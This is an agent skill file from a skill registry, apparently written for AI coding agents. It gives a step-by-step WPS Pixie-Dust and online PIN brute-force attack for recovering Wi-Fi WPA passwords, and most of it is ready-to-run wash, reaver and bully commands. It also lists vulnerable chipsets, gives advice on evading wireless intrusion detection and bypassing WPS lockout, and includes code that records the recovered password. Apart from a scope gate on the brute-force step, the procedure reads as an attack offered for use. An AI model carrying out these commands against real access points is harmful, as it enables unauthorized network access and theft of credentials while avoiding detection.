# Wps Pixie Dust

> WPS Pixie-Dust offline nonce attack (reaver -K / pixiewps) and fallback online PIN brute (bully) to recover the AP's WPA PSK without capturing a handshake.

- Skill: `purpleailab/wps-pixie-dust` (Agent Skill)
- Install (CLI): `npx skillmds@latest add purpleailab/wps-pixie-dust`
- Raw SKILL.md: https://api.skillmd.com/api/skills/purpleailab/wps-pixie-dust/raw
- Safety review: pending
- Works with: Claude Code, Claude.ai, OpenAI Codex
- Category: Coding & Dev Tools
- Author: purpleailab (https://skillmd.com/u/purpleailab)
- Updated: 2026-09-17
- Page: https://skillmd.com/skills/purpleailab/wps-pixie-dust

---


# WPS Pixie-Dust + Online PIN Brute

> Pixie-Dust is a single-association offline attack — quiet by
> wireless IDS standards. Online brute is loud, triggers lockout on
> most modern APs, and should be gated behind `posture=loud`. When
> Pixie-Dust succeeds, reaver returns the full WPA PSK directly —
> no handshake capture or hashcat cracking required.

## Prerequisites

- Monitor-mode adapter.
- Tools: `wash`, `reaver`, `bully`, `pixiewps` (installed as reaver dependency on Kali).
- Target AP must have WPS enabled (check with `wash`).

## Step 1 — Enumerate WPS-enabled APs

```bash
# Scan for WPS-enabled APs on all channels
sudo wash -i <mon-iface> --ignore-fcs 2>/dev/null

# Key columns in wash output:
# BSSID | Ch | dBm | WPS | Lck | Vendor | ESSID
# WPS = WPS version (1.0 / 2.0)
# Lck = WPS Locked (Yes/No) — locked APs resist online brute;
#       Pixie-Dust may still work if the nonce is weak.

# Targeted scan on a single channel
sudo wash -i <mon-iface> -c <CHANNEL> --ignore-fcs 2>/dev/null
```

## Step 2 — Pixie-Dust (preferred, OPSEC-quiet)

The Pixie-Dust attack exploits weak or reused ES1/ES2 nonces in the
WPS EAP exchange. The AP sends both nonces during PIN verification;
if they are pseudo-random (common on Ralink/Realtek/Broadcom chipsets
from 2010–2018), pixiewps recovers the PIN offline from a single
exchange (~1–5 seconds).

```bash
# Pixie-Dust with reaver (-K 1 enables pixiewps mode)
sudo reaver -i <mon-iface> -b <BSSID> -c <CHANNEL> \
    -K 1 -vv -N

# -K 1   : enable Pixie-Dust (pixiewps)
# -vv    : verbose output showing nonces and PIN
# -N     : do not send NACK (reduces retransmissions)

# Successful output looks like:
# [+] WPS PIN: '12345670'
# [+] WPA PSK: 'SuperSecretPass99'
# [+] AP SSID: 'TargetSSID'
```

```bash
# Alternative: bully with Pixie-Dust
sudo bully <mon-iface> -b <BSSID> -c <CHANNEL> -d -v 3

# -d  : enable Pixie-Dust mode
# -v 3: verbose level 3
```

**Pixie-vulnerable chipsets (non-exhaustive):**

| Chipset / Vendor | Vulnerability |
|---|---|
| Ralink RT2860/RT3070 | ES1=ES2=0x00…00 (zero nonce) |
| Realtek RTL8188 | Reused nonces across sessions |
| Broadcom BCM4325/BCM4329 | Predictable PRF seed |
| Atheros AR9271 | Session-invariant nonces on some firmware |
| MediaTek MT7612 (pre-2017) | Weak PRNG |

Patched or unaffected: modern Intel, Qualcomm Atheros post-2018,
most WPA3-capable APs with WPS 2.0.4+.

## Step 3 — Fallback online PIN brute (posture=loud only)

If Pixie-Dust fails (nonces are random), fall back to online PIN brute.
The WPS PIN space is 10^8 but the last digit is a checksum, and the
verifier splits the PIN: M1–M4 test the first 4 digits (10^4 = 10000
attempts), M5–M7 test the last 3+checksum (10^3 = 1000 attempts).
Total: ~11,000 attempts.

```bash
# Online brute with reaver
sudo reaver -i <mon-iface> -b <BSSID> -c <CHANNEL> \
    -vv --delay=1 --lock-delay=60

# --delay=1      : 1s between attempts (reduces lockout)
# --lock-delay=60: wait 60s when AP locks WPS

# Online brute with bully (better lockout handling)
sudo bully <mon-iface> -b <BSSID> -c <CHANNEL> \
    --pixiewps-dir /usr/share/bully \
    -d -S -F -B -v 3
```

**RoE gate for online brute:**

```
HARD STOP: online WPS brute requires posture=loud in RoE.
  - Generates ~11,000 EAP-WPS associations → extremely loud.
  - Many APs lock WPS after 3–5 failed attempts (WPS Locked = Yes in wash).
  - Some APs brick WPS permanently after repeated lockouts.
  - Confirm target AP is in scope and WPS DoS/lockout is an accepted risk.
```

## Step 4 — On PIN recovery

When either method recovers the PIN, reaver/bully print the PSK:

```bash
# If PIN is known but PSK needs re-extraction (e.g., AP rebooted):
sudo reaver -i <mon-iface> -b <BSSID> -c <CHANNEL> -p <known_PIN> -vv
```

## Evidence

```python
kg_add_node(
    kind="credential",
    label=f"WiFi PSK for {ssid} (WPS Pixie-Dust)",
    props={
        "key": f"wifi-psk::{bssid}",
        "secret_type": "wpa_psk",
        "ssid": ssid,
        "bssid": bssid,
        "psk": psk,
        "wps_pin": pin,
        "attack_path": "wps-pixie-dust",
        "recovered_at": "<iso8601>",
        "source": "reaver+pixiewps",
    },
)

kg_add_node(
    kind="finding",
    label="WPS Pixie-Dust Susceptible",
    props={
        "key": f"wps-pixie-dust::{bssid}",
        "severity": "critical",
        "wps_version": wps_version,
        "chipset_guess": chipset,
        "remediation": (
            "Disable WPS entirely on the AP. If WPS must remain enabled, "
            "upgrade firmware; WPS 2.0.4+ with secure random nonces mitigates "
            "Pixie-Dust. Disable WPS PIN method; keep only WPS Push-Button "
            "with physical access requirement."
        ),
    },
)
```

## ZFP

1. Pcap of the WPS EAP exchange (airodump running during reaver — `cap-01.cap`).
2. reaver / bully console output showing PIN + PSK recovery line.
3. Optionally: `pixiewps -e <ES1> -r <ES2> ...` output showing offline nonce extraction.

## OPSEC notes

- Pixie-Dust is a **single WPS association** — generates one EAP-WPS
  exchange. Most WIDS do not alert on a single WPS attempt.
- Online PIN brute generates hundreds to thousands of associations —
  visible in WIDS, triggers WPS lockout, and may corrupt WPS state.
- WPS Locked (`Lck=Yes` in wash) does NOT prevent Pixie-Dust; it only
  blocks further PIN attempts after the current session.
- Running reaver on a WPS-locked AP with Pixie-Dust: add `--ignore-locks`.

## References

- Dominique Bongard, "Offline bruteforce attack on WiFi Protected Setup" (PixieDust, 2014).
- pixiewps: github.com/wiire-a/pixiewps
- reaver-wps-fork-t6x: github.com/t6x/reaver-wps-fork-t6x
- bully: github.com/nicowillis/bully
- `wpa2-psk` skill — alternative PSK capture if WPS fails.

